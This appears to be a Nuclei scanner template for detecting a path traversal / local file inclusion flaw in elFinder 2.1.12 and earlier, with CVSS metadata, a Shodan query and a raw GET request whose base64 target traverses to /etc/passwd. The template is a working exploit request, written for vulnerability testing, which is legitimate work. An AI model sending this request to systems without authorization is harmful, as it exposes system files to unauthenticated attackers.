elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
PoC代码[已公开]
id: elFinder-path-traversal
info:
name: elFinder <=2.1.12 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"elfinder"
product: elfinder
vendor: std42
tags: lfi,elfinder,vuln
http:
- raw:
- |
GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022016922aec285a8c8884f1bfc6d7a4eff58d80af984961ebb5e74ac19b1c90678302207a440efe926f33361e883b6a79f96ad4bc5846416f80cefcf1399660b81d9e3c:922c64590222798bb761d5b6d8e72950